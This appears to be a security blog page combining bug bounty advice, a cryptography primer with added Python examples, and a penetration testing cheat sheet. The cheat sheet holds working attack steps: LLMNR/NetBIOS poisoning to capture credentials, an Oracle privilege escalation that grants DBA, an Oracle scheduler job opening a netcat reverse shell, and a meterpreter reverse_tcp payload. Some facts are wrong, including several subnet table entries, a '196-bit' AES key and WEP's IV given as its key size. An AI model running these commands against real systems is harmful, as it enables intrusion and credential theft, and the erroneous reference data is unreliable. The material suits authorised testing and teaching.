Tuesday, 31 March 2020

This is a collection of bug bounty reports that were submitted by security researchers in the infosec community. These write-ups are a great way to learn from fellow hackers.

Web Hacking

Hardware Hacking

10 Rules of Bug Bounty

1. Targeting the Bug Bounty Program
How long do you target a program?
If the answer is just a few hours or a night, that's where you are going wrong. Bug hunting is a matter of skill and luck. Spending just a few hours on a program is usually a waste, because the bugs you find that quickly have mostly been reported already, and you may end up depressed by duplicates. I would suggest choosing a program and spending at least a week on it. Big bugs take time. Take your time to understand the functionality of the application, keep writing notes, and keep track of suspicious endpoints.
You are not going to earn much for a known issue unless you are very early to report it. If you find out about a public program 10 or 12 hours after its launch, don't waste your time looking for known issues or low-hanging fruit. Just take a deep dive into the application.

2. How do you Approach the Target?
If the answer is just signing up at the target and checking for vulnerabilities like CSRF, XSS, subdomains and so on, that could be the reason you end up with many duplicates or no bugs at all. I would suggest first checking the program's documentation. Recon the target. Understand the functionality and the privileges of each kind of user in the target. Spend at least 1 to 2 days on recon, reading their docs and gathering information before you start attacking.



3. Don't Expect Anything!
We believe the most common thing bug hunters do after reporting a bug is to start expecting the upcoming reward amount. Don't expect anything; just close the report and start looking for other bugs, because waiting could end up making you sad.
If you set the mindset that you are going to hunt bugs in a matter of hours or a night, this may or may not work every time. Instead you could set a mindset like "I'm going to hunt bugs for a whole week; let's just keep a target of $100." Believe me, you will end up making 10x the target amount by the end of the week, and the result will be happiness.
Some high severity bugs may be rewarded with low or average bounties. Don't shout at the program; just ask politely what the reason for the bounty decision was. More importantly, be happy and thankful for what you found.
Try to accept this: "Sometimes we get unexpected rewards for small issues; we should also accept smaller amounts for high severity issues as well."

4. Less Knowledge about Vulnerabilities and Testing Methodologies:
This is also a common scenario: a lot of new bounty hunters start looking for bugs without basic knowledge of how things work. What I have learned from my personal experience is that you will only get to know how an application works once you know how applications are built. It is necessary to first know how an application is built with a programming language before you start breaking it.

5. Surround yourself with the Bug Bounty Community to keep yourself updated.
1. Create a Twitter handle and go to the HackerOne leaderboard.
2. Go to their HackerOne profiles one by one and follow them on Twitter. The same applies to Bugcrowd and other platforms as well. This way you surround yourself with bug hunters and security researchers.
3. Keep bookmarking.
4. Join Bug Bounty World on Slack, keep reading their blogs, tools and general channels and their conversations about testing, and share what you know.

6. AUTOMATION: "Automation is power." If you want to automate things, you need to learn scripting. It is highly recommended to learn a programming language. Some of the best scripting languages are JS, Python, Ruby and Bash; even knowing some curl tricks or basic bash scripting gives you the power to automate a lot of tasks!
"Hacking is an art of your own creation."

7. GET BOUNTY or GET EXPERIENCE: As bug hunters, we sometimes feel sad when no bounty is received. However, we always gain experience and knowledge, and our skills improve. Look at bug bounty this way and keep your motivation up day by day. A lot of our life is made of emotions; it is about how you feel your life moment after moment, doing all the things that make you happy. So, if you do bug bounties, be happy, have fun! That's the essence of this. I remind myself every day when I feel sad or unmotivated: hey @ak1t4! What's happening? Remember to enjoy this!
"If you don't get a bounty, you get knowledge and experience. That's why you always win!"

8. FIND THE "BUG" or FIND A "BUG CHAIN":
If you find a bug, always ask yourself: what is the security impact on the application? You can start hunting with the concept of "find a bug" in mind, or you can think outside the box and start hunting with the concept of "look for the biggest impact". The first concept is totally isolated; the second embraces a much bigger point of view.
"Stay in the valley, or work hard to climb the mountain and see the big panorama."

9. FOLLOW THE MASTERS' PATH: I ask myself every day how to improve my skills a lot more, then I go and search for awesome hackers' blogs or the best write-ups I can find. The best hackers inspire us to be better versions of ourselves.
"My daily inspiration is those who break their own limits and succeed."

10. RELAX & ENJOY LIFE: Real success happens when you enjoy a balanced life. Your body and your mind need adequate rest to go beyond their own limits. If you spend a lot of hours hunting, close your laptop and go outside to be more connected with the natural world. When you hunt with a rested mind, you can see beyond the bugs to all the important details that count for a successful attack or PoC. Find everything that gives you joy or peace, everything that embraces you and improves you emotionally and mentally. Spend time with your friends and family; this life is like a shooting star, enjoy that light!


Resources :

Books:
Burp Suite Tool Attack Approach
Browser Plugins:
Tools:
Bug Bounty References:
Payloads:

Sunday, 9 February 2020

Cryptography Basics

As hackers, we are often faced with the hurdle of cryptography and encryption. In some cases, we use it to hide our own actions and messages. Many applications and protocols use encryption to maintain the confidentiality and integrity of data. To be able to crack passwords and encrypted protocols such as SSL and wireless, you need to at least be familiar with the concepts and terminology of cryptography and encryption.
To many new hackers, the concepts and terminology of cryptography can be a bit overwhelming and opaque. Cryptography is the science and art of hiding messages so that they stay confidential, then "unhiding" them so that only the intended recipient can read them. Basically, cryptography is the science of secret messaging.

With this brief overview for the newcomer, I hope to lift the fog that shrouds this subject and shed a tiny bit of light on cryptography. I intend this simply to be a quick and cursory overview of cryptography for the novice hacker, not a treatise on the algorithms and mathematics of encryption. I'll try to familiarize you with the basic terminology and concepts so that when you read about hashing, wireless cracking, or password cracking and encryption technologies are mentioned, you have some grasp of what is being addressed.

Don’t get me wrong, I don’t intend to make you a cryptographer here (that would take years), but simply to help familiarize the beginner with the terms and concepts of cryptography so as to help you become a credible hacker.

I will attempt to use as much plain English to describe these technologies as possible, but like everything in IT, there is a very specialized language for cryptography and encryption. Terms like cipher, plaintext, ciphertext, keyspace, block size, and collisions can make studying cryptography a bit confusing and overwhelming to the beginner. I will use the term “collision,” as there really is no other word in plain English that can replace it.

Let’s get started by breaking encryption into several categories.

Types of Cryptography

There are several ways to categorize encryption, but for our purposes here, I have broken them down into four main areas.

Symmetric Encryption
Asymmetric Encryption
Hashes
Wireless

A Word About Key Size

In the world of cryptography, size does matter! In general, the larger the key, the more secure the encryption. This means that AES with a 256-bit key is stronger than AES with a 128-bit key and likely will be more difficult to break. Within the same encryption algorithm, the larger the key, the stronger the encryption.

It does not necessarily mean that larger keys mean stronger encryption between encryption algorithms. Between algorithms, the strength of the encryption is dependent on both the particulars of the algorithm and the key size.

Symmetric Cryptography

Symmetric cryptography is where we have the same key at the sender and receiver. It is probably the most common form of cryptography. You have a password or key that encrypts a message and I have the same password to decrypt the message. Anyone else can’t read our message or data.

Symmetric cryptography is very fast, so it is well-suited for bulk storage or streaming applications. The drawback to symmetric cryptography is what is called the key exchange. If both ends need the same key, they need to use a third channel to exchange the key and therein lies the weakness. If there are two people who want to encrypt their communication and they are 12,000 miles apart, how do they exchange the key? This key exchange then is fraught with all the problems of the confidentiality of the medium they choose, whether it be telephone, mail, email, face-to-face, etc. The key exchange can be intercepted and render the confidentiality of the encryption moot.

Some of the common symmetric algorithms that you should be familiar with are:

DES – This was one of the original and oldest encryption schemes developed by IBM. It was found to be flawed and breakable and was used in the original hashing system of LANMAN hashes in early (pre-2000) Windows systems.
3DES – This encryption algorithm was developed in response to the flaws in DES. 3DES applies the DES algorithm three times (hence the name “triple DES”) making it slightly more secure than DES.
AES – Advanced Encryption Standard is not an encryption algorithm as such but rather a standard developed by NIST. Presently, it is considered the strongest encryption; it uses a 128-, 196-, or 256-bit key and has been fulfilled by the Rijndael algorithm since 2001. Used in WPA2, SSL/TLS, and many other protocols where confidentiality and speed are important.
RC4 – This is a stream cipher (it encrypts each bit or byte rather than a block of information) developed by Ronald Rivest of RSA fame. Used in VoIP and WEP.
Blowfish – The first of Bruce Schneier's encryption algorithms. It uses a variable key length and is very secure. It is not patented, so anyone can use it without a license.
Twofish – A stronger version of Blowfish using a 128- or 256-bit key and was a strong contender for AES. Used in Cryptcat and OpenPGP, among other places. It also is in the public domain without a patent.

Asymmetric Cryptography

Asymmetric cryptography uses different keys on both ends of the communication channel. Asymmetric cryptography is very slow, about 1,000 times slower than symmetric cryptography, so we don’t want to use it for bulk encryption or streaming communication. It does, however, solve the key exchange problem. Since we don’t need to have the same key on both ends of a communication, we don’t have the issue of key exchange.

Asymmetric cryptography is used primarily when we have two entities unknown to each other that want to exchange a small bit of information, such as a key or other identifying information, such as a certificate. It is not used for bulk or streaming-encryption due to its speed limitations.

Some of the common asymmetric encryption schemes you should be familiar with are:

Diffie-Hellman – Many people in the field of cryptography regard the Diffie-Hellman key exchange to be the greatest development in cryptography (I would have to agree). Without going deep into the mathematics, Diffie and Hellman developed a way to generate keys without having to exchange the keys, thereby solving the key exchange problem that plagues symmetric key encryption.
RSA – Rivest, Shamir, and Adleman is a scheme of asymmetric encryption that uses factorization of very large prime numbers as the relationship between the two keys.
PKI – Public key infrastructure is the widely used asymmetric system for exchanging confidential information using a private key and a public key.
ECC – Elliptic-curve cryptography is becoming increasingly popular in mobile computing as it is efficient, requiring less computing power and energy for the same level of security. ECC relies upon the shared relationship of two points on the same elliptic curve.
PGP – Pretty Good Privacy uses asymmetric encryption to assure the privacy and integrity of email messages.
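The Diffie-Hellman exchange described above, worked through in Python as an added example (illustration code written for this page, not from the original author). Both sides are simulated in one process; only p, g and the two public values would cross the wire, and the private exponents never leave their owner. The group parameters P_TOY = 23 and G_TOY = 5 are textbook toy values chosen so the arithmetic can be checked by hand, and are not a secure group. The final step hashes the shared secret with SHA-256 to derive a symmetric key, which is how the slow asymmetric step hands off to fast symmetric encryption for bulk data.

```python
import hashlib
import secrets
from typing import Optional

# Toy group parameters, constructed for illustration only (NOT a secure group;
# real deployments use standardised 2048-bit or larger groups, or ECDH).
P_TOY = 23
G_TOY = 5


def dh_public(p: int, g: int, private: int) -> int:
    """Public value g^private mod p. This is the only thing a party sends."""
    return pow(g, private, p)


def dh_shared(p: int, peer_public: int, private: int) -> int:
    """Shared secret peer_public^private mod p, computed locally by each side."""
    return pow(peer_public, private, p)


def derive_symmetric_key(shared_secret: int) -> bytes:
    """Hash the shared integer into a fixed-size key for a symmetric cipher."""
    width = (shared_secret.bit_length() + 7) // 8 or 1
    return hashlib.sha256(shared_secret.to_bytes(width, "big")).digest()


def dh_exchange(p: int, g: int, a_priv: Optional[int] = None,
                b_priv: Optional[int] = None) -> dict:
    """Simulate both parties of a Diffie-Hellman exchange.

    Returns what an eavesdropper sees (p, g, A, B) alongside what each party
    computes privately, so a caller can confirm the two sides agree.
    """
    # Private exponents never leave their owner; pick random ones if not given.
    if a_priv is None:
        a_priv = secrets.randbelow(p - 3) + 2  # in [2, p-2]
    if b_priv is None:
        b_priv = secrets.randbelow(p - 3) + 2

    A = dh_public(p, g, a_priv)  # Alice -> Bob
    B = dh_public(p, g, b_priv)  # Bob -> Alice

    alice_secret = dh_shared(p, B, a_priv)
    bob_secret = dh_shared(p, A, b_priv)

    return {
        "on_the_wire": (p, g, A, B),
        "alice_secret": alice_secret,
        "bob_secret": bob_secret,
        "alice_key": derive_symmetric_key(alice_secret),
        "bob_key": derive_symmetric_key(bob_secret),
    }


if __name__ == "__main__":
    # Textbook values: a = 6, b = 15 give A = 8, B = 19 and shared secret 2.
    result = dh_exchange(P_TOY, G_TOY, a_priv=6, b_priv=15)
    print("eavesdropper sees:", result["on_the_wire"])
    print("both sides derive:", result["alice_secret"], result["bob_secret"])
    print("keys match:", result["alice_key"] == result["bob_key"])
```

With the toy parameters the eavesdropper sees (23, 5, 8, 19) and would have to solve a discrete logarithm to recover the private exponents; with a real-size prime that is what makes the exchange safe even though every transmitted value is public.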

Hashes

Hashes are one-way encryption. A message or password is encrypted in a way that it cannot be reversed or unencrypted. You might wonder, “What good would it do us to have something encrypted and then not be able to decrypt it?” Good question!

When the message is encrypted it creates a “hash” that becomes a unique, but indecipherable signature for the underlying message. Each and every message is encrypted in a way that creates a unique hash. Usually, these hashes are a fixed length (an MD5 hash is always 32 characters). In that way, the attacker can not decipher any information about the underlying message from the length of the hash. Due to this, we don’t need to know the original message, we simply need to see whether some text creates the same hash to check its integrity.

This is why hashes can be used to store passwords. The passwords are stored as hashes and then when someone tries to log in, the system hashes the password and checks to see whether the hash generated matches the hash that has been stored. In addition, hashes are useful for integrity checking, for instance with file downloads or system files.
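The two uses just described, password storage and integrity checking, as an added Python example (written for this page, not the author's code). It uses only the standard library: hashlib for the digests, a salted and iterated PBKDF2 for passwords so that two users with the same password do not end up with the same stored hash, and hmac.compare_digest so the comparison does not leak timing. The stored-record layout pbkdf2_sha256$iterations$salt$hash is a format chosen here for illustration.

```python
import hashlib
import hmac
import os
from typing import Optional


def digest_hex(data: bytes, algo: str) -> str:
    """Hex digest of data; its length depends on the algorithm, not on the input."""
    return hashlib.new(algo, data).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 600_000) -> str:
    """Return a self-describing record: pbkdf2_sha256$iterations$salt_hex$hash_hex.

    A fresh random salt means the same password hashes differently for every
    user, and the iteration count slows down offline guessing.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count, then compare in constant time."""
    algo, iterations, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record format: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), hash_hex)


def verify_integrity(data: bytes, expected_sha256_hex: str) -> bool:
    """Integrity check as done for downloads: recompute and compare the published digest."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_sha256_hex.lower())


if __name__ == "__main__":
    msg = b"The quick brown fox"
    for algo in ("md5", "sha1", "sha256"):
        print(algo, len(digest_hex(msg, algo)), "hex chars")

    record = hash_password("correct horse battery staple")
    print("login ok:", verify_password("correct horse battery staple", record))
    print("wrong pw:", verify_password("Tr0ub4dor&3", record))

    # Constructed "download": in practice the expected digest comes from the vendor's site.
    blob = b"pretend-installer-bytes"
    published = hashlib.sha256(blob).hexdigest()
    print("intact:", verify_integrity(blob, published))
    print("tampered:", verify_integrity(blob + b"x", published))
```

Note that the MD5 digest is always 32 hex characters and SHA-1 always 40, whatever the input length, which is the fixed-length property the paragraph above describes; the password functions deliberately avoid a bare MD5 or SHA-1, since an unsalted fast hash lets an attacker who obtains the database test guesses at full speed and spot users who share a password.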

In the world of encryption and hashing, a “collision” is where two different input texts produce the same hash. In other words, the hash is not unique. This can be an issue when we assume that all the hashes are unique such as in certificate exchanges in SSL. NSA used this property of collisions in the Stuxnet malware to provide it with what appeared to be a legitimate Microsoft certificate. Hash algorithms that produce collisions, as you might guess, are flawed and insecure.
These are the hashes you should be familiar with.

MD4 – This was an early hash by Ron Rivest and has largely been discontinued in use due to collisions.
MD5 – The most widely used hashing system. It’s 128-bit and produces a 32-character message digest.
SHA1– Developed by the NSA, it is more secure than MD5, but not as widely used. It has 160-bit digest which is usually rendered in 40-character hexadecimal. Often used for certificate exchanges in SSL, but because of recently discovered flaws, it is being deprecated for that purpose.

Wireless Cryptography

Wireless cryptography has been a favorite of Null Byte readers as so many here are trying to crack wireless access points. As you might guess, wireless cryptography is symmetric (for speed), and as with all symmetric cryptography, key exchange is critical.

WEP – This was the original encryption scheme for wireless and was quickly discovered to be flawed. It used RC4, but because of the small key size (24-bit), it repeated the IV about every 5,000 packets enabling easy cracking on a busy network.
WPA – This was a quick fix for the flaws of WEP, adding a larger key and TKIP to make it slightly more difficult to crack.
WPA2-PSK – This was the first of the more secure wireless encryption schemes. It uses a pre-shared key and AES. It then salts the hashes with the AP name or SSID. The hash is exchanged at authentication in a four-way handshake between the client and AP.
WPA2-Enterprise – This wireless encryption is the most secure. It uses a 128-bit key, AES, and a remote authentication server (RADIUS).
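Two numbers on this page, the hash "collision" in the Hashes section and WEP's 24-bit IV repeating after roughly 5,000 packets, are both instances of the same birthday bound, and this added Python example (not from the original page) carries the calculation through. collision_probability computes the exact product for small spaces; the square-root approximation is what you use for a 128-bit digest, where the loop is infeasible.

```python
import math


def collision_probability(space: int, draws: int) -> float:
    """Exact probability that `draws` uniform random values from `space` contain a repeat."""
    if draws > space:
        return 1.0  # pigeonhole: more draws than values guarantees a repeat
    p_no_collision = 1.0
    for i in range(draws):
        p_no_collision *= (space - i) / space
    return 1.0 - p_no_collision


def collision_probability_approx(space: int, draws: int) -> float:
    """Birthday approximation 1 - exp(-k(k-1)/2N); accurate whenever draws << space."""
    return 1.0 - math.exp(-draws * (draws - 1) / (2.0 * space))


def expected_draws_to_first_collision(space: int) -> float:
    """Mean number of draws before the first repeat: sqrt(pi * N / 2)."""
    return math.sqrt(math.pi * space / 2.0)


def draws_for_probability(space: int, probability: float) -> float:
    """How many draws give at least `probability` of a collision: sqrt(2N ln(1/(1-p)))."""
    return math.sqrt(2.0 * space * math.log(1.0 / (1.0 - probability)))


if __name__ == "__main__":
    wep_ivs = 2 ** 24  # WEP uses a 24-bit IV, so only 2^24 distinct values exist
    print("WEP: expected packets before an IV repeats:",
          round(expected_draws_to_first_collision(wep_ivs)))
    print("WEP: P(repeat within 5000 packets) =",
          round(collision_probability(wep_ivs, 5000), 3))
    for name, bits in (("MD5", 128), ("SHA-1", 160), ("SHA-256", 256)):
        work = math.log2(expected_draws_to_first_collision(2 ** bits))
        print(f"{name}: about 2^{work:.1f} random inputs for a chance collision")
```

The WEP figure comes out at about 5,100 packets, which is where the "about every 5,000 packets" above comes from; on a busy network that is seconds, not hours. For a digest of n bits the same formula gives roughly 2^(n/2) inputs, so a 128-bit hash gives only 64-bit collision resistance by chance alone, and the practical attacks on MD5 and SHA-1 do far better than chance, which is why they are deprecated for certificates.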


Pentesters Cheat Sheet


This is a quick reference, high-level overview for typical penetration testing engagements, designed as a cheat sheet of the typical commands you would run when performing a penetration test. For more in-depth information I'd recommend the man page for the tool or a more specific pen testing cheat sheet.

The focus of this cheat sheet is infrastructure/network penetration testing; web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For web application penetration testing, check out the Web Application Hacker's Handbook; it is excellent for both learning and reference.

Pre-engagement

Network Configuration:

Set IP Address.
ifconfig eth0 xxx.xxx.xxx.xxx/24

Subnetting:

ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0

OSINT

Passive Information Gathering:

DNS:

WHOIS enumeration.
whois domain-name-here.com

Perform DNS IP Lookup.
dig a domain-name-here.com @nameserver

Perform MX Record Lookup.
dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG.
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers:

Windows DNS zone transfer.
nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer.
dig axfr blah.com @ns1.blah.com

Email:

Simply Email:
Use Simply Email to enumerate all the online places (GitHub, target site, etc.). It works better if you use proxies or set long throttle times so Google doesn't think you're a robot and make you fill out a CAPTCHA.

git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresses after gathering.

Semi-Active Information Gathering:

Basic Finger Printing:
Manual fingerprinting / banner grabbing.

Basic versioning / fingerprinting via the displayed banner:
nc -v 192.168.1.1 25
telnet 192.168.1.1 25

Banner grabbing with NC:
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referer: meh-domain

Active Information Gathering

DNS Bruteforce:

DNSRecon:

DNS Enumeration Kali – DNSRecon:

root# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

Port Scanning:

Nmap Commands:
For more commands, see the Nmap cheat sheet in another post.

Basic Nmap Commands:

Nmap verbose scan, runs SYN stealth, T4 timing (should be ok on a LAN), OS and service version info, traceroute and scripts against services:
nmap -v -sS -A -T4 target

As above but scans all TCP ports (takes a lot longer):
nmap -v -sS -p- -A -T4 target

As above but scans all TCP ports and UDP scan (takes even longer).
nmap -v -sU -sS -p- -A -T4 target

Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause a knockover (crash the target).
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X

Search nmap scripts for keywords.
ls /usr/share/nmap/scripts/* | grep ftp

I've had a few people mention T4 scans; apply common sense here. Don't use T4 on external pen tests (over an Internet connection); you're probably better off using T2 with a TCP connect scan. A T4 scan is better suited to an internal pen test over low-latency links with plenty of bandwidth. But it all depends on the target devices: embedded devices are going to struggle if you T4 / T5 them and will give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan of the top 1000 ports so you can start pen-testing, then kick off a slower scan.

Nmap UDP Scanning:
nmap -sU TARGET

UDP Protocol Scanner:
git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:
./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:
udp-proto-scanner.pl -p ntp -f ips.txt

Other Host Discovery
Other methods of host discovery, that don’t use nmap…

Discovers IP, MAC address and MAC vendor on the subnet from ARP; helpful for confirming you're on the right VLAN at the client site:
netdiscover -r 192.168.1.0/24

Enumeration & Attacking Network Services:
Penetration testing tools that specifically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration:

Samba Enumeration:

SMB Enumeration Tools:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target

Also see, nbtscan cheat sheet in another post.

Discover Windows / Samba servers on the subnet, find Windows MAC addresses and NetBIOS names, and discover the client workgroup / domain:
nbtscan 192.168.1.0/24

Do everything: runs all options (find Windows client domain/workgroup) apart from dictionary-based share name guessing:
enum4linux -a target-ip

Fingerprint SMB Version:
smbclient -L //192.168.1.100

Find open SMB Shares:
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

RID Cycling:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:
Windows:
net use \\TARGET-IP\IPC$ "" /u:""

Linux:
smbclient -L //192.168.99.131

NBTScan unixwiz
Install on Kali rolling:

apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing:
Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py:
Alternatively, you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

Run Responder.py for the whole engagement
Run Responder.py for the length of the engagement while you’re working on other attack vectors.

SNMP Enumeration Tools:
A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo “” > /etc/snmp/snmp.conf

SNMP enumeration:
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMPv3 Enumeration Tools
Identify SNMPv3 servers with nmap:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the
username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

Use Metasploit's Wordlist:
Metasploit's wordlist (Kali path below) has common credentials for SNMP v1 and v2; for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration:
This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration
RSH Run Commands:
rsh

Metasploit RSH Login Scanner:
auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users:
rusers -al 192.168.2.1

rusers scan whole Subnet:
rlogin -l

e.g. rlogin -l root TARGET-SUBNET/24

Finger Enumeration:
finger @TARGET-IP

Finger a Specific Username:
finger batman@TARGET-IP

Solaris bug that shows all logged in users:
finger 0@host

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost

rwho:
Use nmap to identify machines running rwhod (513 UDP).

TLS & SSL Testing:

testssl.sh:

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html

Vulnerability Assessment:
Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:
netstat -tulpn

Login at https://127.0.0.1:9392 – credentials are generated during openvas-setup.

Database Penetration Testing:
Attacking database servers exposed on the network.

Oracle:
Install oscanner:
apt-get install oscanner

Run oscanner:
oscanner -s 192.168.1.200 -P 1521

Fingerprint Oracle TNS Version:

Install tnscmd10g:
apt-get install tnscmd10g

Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version

Brute force oracle user accounts
Identify default Oracle accounts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute

Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET

Oracle Privilege Escalation:
Requirements:

- Oracle needs to be exposed on the network
- A default account is in use, like Scott

A quick overview of how this works:

1. Create the function.
2. Create an index on table SYS.DUAL.
3. The index we just created executes our function SCOTT.DBA_X.
4. The function will be executed by the SYS user (as that's the user that owns the table).
5. Create an account with DBA privileges.

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid current_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;

Oracle priv esc and obtain DBA access:
Run netcat:
netcat -nvlp 443

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:
drop index exploit_1337;

Get Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name => 'rev_shell', job_type => 'EXECUTABLE', job_action => '/bin/nc', number_of_arguments => 4, start_date => SYSTIMESTAMP, enabled => FALSE, auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;

MSSQL:
Enumeration / Discovery:

Nmap:
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping

Use MS SQL Server's Browse For More:
Try using “Browse for More” via MS SQL Server Management Studio.

Bruteforce MSSQL Login:
msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network:
Plink.exe Tunnel:
PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

Pivoting:

SSH Pivoting:
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting:
TTL Finger Printing:
OPERATING SYSTEM    TTL SIZE
Windows             128
Linux               64
Solaris             255
Cisco / Network     255

IPv4 Cheat Sheets:
Classful IP Ranges:
E.g. Class A, B, C (deprecated)

CLASS      IP ADDRESS RANGE
Class A    0.0.0.0 – 127.255.255.255
Class B    128.0.0.0 – 191.255.255.255
Class C    192.0.0.0 – 223.255.255.255
Class D    224.0.0.0 – 239.255.255.255
Class E    240.0.0.0 – 255.255.255.255

IPv4 Private Address Ranges:
CLASS                      RANGE
Class A Private Address    10.0.0.0 – 10.255.255.255
Class B Private Address    172.16.0.0 – 172.31.255.255
Class C Private Address    192.168.0.0 – 192.168.255.255
Loopback                   127.0.0.0 – 127.255.255.255

IPv4 Subnet Cheat Sheet:
Subnet cheat sheet, not really related to pen testing but a useful reference.

CIDR    DECIMAL MASK        NUMBER OF HOSTS
/31     255.255.255.254     1 Host
/30     255.255.255.252     2 Hosts
/29     255.255.255.249     6 Hosts
/28     255.255.255.240     4 Hosts
/27     255.255.255.224     30 Hosts
/26     255.255.255.192     62 Hosts
/25     255.255.255.128     126 Hosts
/24     255.255.255.0       254 Hosts
/23     255.255.254.0       512 Hosts
/22     255.255.252.0       1022 Hosts
/21     255.255.248.0       2046 Hosts
/20     255.255.240.0       4094 Hosts
/19     255.255.224.0       8190 Hosts
/18     255.255.192.0       16382 Hosts
/17     255.255.128.0       32766 Hosts
/16     255.255.0.0         65534 Hosts
/15     255.254.0.0         131070 Hosts
/14     255.252.0.0         262142 Hosts
/13     255.248.0.0         524286 Hosts
/12     255.240.0.0         1048674 Hosts
/11     255.224.0.0         2097150 Hosts
/10     255.192.0.0         4194302 Hosts
/9      255.128.0.0         8388606 Hosts
/8      255.0.0.0           16777214 Hosts
